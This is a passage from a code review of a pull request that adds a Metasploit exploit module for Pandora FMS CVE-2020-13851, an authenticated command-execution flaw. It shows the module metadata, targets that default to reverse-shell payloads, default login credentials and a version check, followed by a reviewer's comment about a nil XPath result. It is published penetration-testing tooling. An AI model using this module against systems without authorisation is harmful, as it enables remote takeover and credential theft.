modules/exploits/linux/http/pandora_fms_events_exec.rb

```diff
@@ -0,0 +1,221 @@
+          password via a simple `grep` command on the plaintext
+          `/var/www/html/pandora_console/include/config.php` file.
+
+          Valid credentials for a Pandora FMS account are required. The account
+          does not need to have admin privileges.
+          This module has been successfully tested on Pandora 7.0 NG 744 running
+          on CentOS 7 (the official virtual appliance ISO for this version).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Fernando Catoira', # Discovery
+            'Julio Sanchez', # Discovery
+            'Erik Wynter' # @wyntererik - Metasploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-13851'], # RCE via the `events` feature
+            ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']
+          ],
+        'Targets' =>
+          [
+            [
+              'Linux (x86)', {
+                'Arch' => ARCH_X86,
+                'Platform' => 'linux',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Linux (x64)', {
+                'Arch' => ARCH_X64,
+                'Platform' => 'linux',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Linux (cmd)', {
+                'Arch' => ARCH_CMD,
+                'Platform' => 'unix',
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'cmd/unix/reverse_bash'
+                }
+              }
+            ]
+          ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-06-04',
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'DefaultTarget' => 1
+      )
+    )
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ]
+  end
+
+  def check
+    vprint_status('Running check')
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')
+      return CheckCode::Safe('Target is not a Pandora FMS application.')
+    end
+
+    @cookie = res.get_cookies
+    html = res.get_html_document
+    full_version = html.at('div[@id="ver_num"]').text
```

Comment:
This will fail if the XPath is `nil`, but I would think the `<title>` check above would prevent that... unless they change their source.

Reply:
you're right, I fixed this now